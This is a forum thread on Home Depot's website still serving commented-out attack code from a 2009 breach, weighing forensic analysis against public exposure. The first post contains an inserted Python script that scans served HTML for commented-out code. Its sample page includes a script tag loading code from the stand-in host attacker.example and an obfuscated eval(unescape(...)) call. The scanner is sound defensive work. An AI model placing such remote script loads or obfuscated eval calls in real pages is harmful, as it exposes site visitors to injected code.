Home Depot website served commented-out code from 2009 security breach...

    Hacker Code Lingered on Home Depot Website

    In this news story, the Home Depot website was, until recently, still serving (commented-out) code that was part of an attack in 2009. The argument posed is that it was left in place to analyze the attack; the article then suggests it was forgotten about until recently, and finally removed.

    What are your thoughts on this? When you find a compromised machine or service that is public-facing, do you leave the code in place, even if disabled in some way, to help with analysis, or do you duplicate the environment within a private network so the public does not need to see the code if they choose to look at the source?

    Is this not feasible in many cases because of the resources businesses would need to replicate an environment?

    I'm reminded of a security presentation back in New York, where a speaker discussed three options available to someone when a security breach is found:
    1) Do nothing about the break-in, ignore it, and/or re-install from backup and keep going.
    2) Choose not to take legal action: this means you can now examine the system in its running state, change the code used, capture images of running code, see if you can infect virtualized systems to step through instructions, etc.
    3) Choose to go legal: begin the process of tracking the chain of evidence, record who has access to what, and shut down the system to keep the state as found, so copies of images can be forensically examined to provide evidence of actions taken by the person or program, etc.

    Each decision has requirements, in results or actions, that are mutually exclusive with those of the other decisions not selected.

    Is this the case with Home Depot? How might this influence support of their case against an attacker if evidence was required in court? Are there any other choices? Would you choose to leave an artifact like this in place for over a year on a public-facing server?

    What are your thoughts on this?
    Last edited by TheCotMan; January 12, 2011, 00:20.
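    One check a defender would want for the situation the post describes, offered here as an added example and not as code from the original thread or from the Home Depot site: scan the HTML a server actually returns for comments that contain code (script tags, eval, encoded string decoders), because a commented-out block is still delivered to every visitor and is one "view source" away. The sample page, the attacker hostname and the token list are constructed for the example.

```python
"""Flag HTML comments that look like commented-out code in a served page.

Added example for this thread, not from the original post or the site it
discusses. SAMPLE_PAGE is constructed; the "disabled" script block in it is
a placeholder, not the real 2009 code.
"""
import re
from html.parser import HTMLParser

# Tokens that suggest a comment holds executable code rather than a note.
# Assumption: this is the list a defender would start with, not an
# exhaustive one.
SUSPICIOUS = re.compile(
    r"<script\b|<iframe\b|\beval\s*\(|document\.write|unescape\s*\(|String\.fromCharCode",
    re.IGNORECASE,
)


class CommentCollector(HTMLParser):
    """Collect every <!-- --> comment together with the line it starts on."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        # getpos() here is the position of the '<!--' that opened the comment.
        line, _col = self.getpos()
        self.comments.append((line, data))


def find_commented_code(html):
    """Return (line, snippet) for each HTML comment that looks like code."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for line, body in parser.comments:
        if SUSPICIOUS.search(body):
            # Collapse whitespace so a multi-line comment reports as one line.
            snippet = " ".join(body.split())[:80]
            hits.append((line, snippet))
    return hits


# Constructed sample page: one harmless template note, and a commented-out
# injected script block of the kind the article describes being left behind.
SAMPLE_PAGE = """<html>
<head>
<!-- header template v3, do not edit by hand -->
<title>Store</title>
</head>
<body>
<p>Welcome</p>
<!-- disabled after incident, keep for analysis
<script src="http://attacker.example/loader.js"></script>
<script>eval(unescape("%61%6c%65%72%74"));</script>
-->
</body>
</html>
"""

if __name__ == "__main__":
    for line, snippet in find_commented_code(SAMPLE_PAGE):
        print(f"line {line}: {snippet}")
```

    Run against a page fetched from the production host (not a dev copy), since the point is what the public can see; the template note on line 3 is not reported, the disabled script block starting on line 8 is.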

  • #2
    Re: Home Depot website served commented-out code from 2009 security breach...

    The production site should be perfect; do your testing (including security) on dev machines. If you really want to share the info with the public, put up a summary page that details what the bad guys did.
    --- The fuck? Have you ever BEEN to Defcon?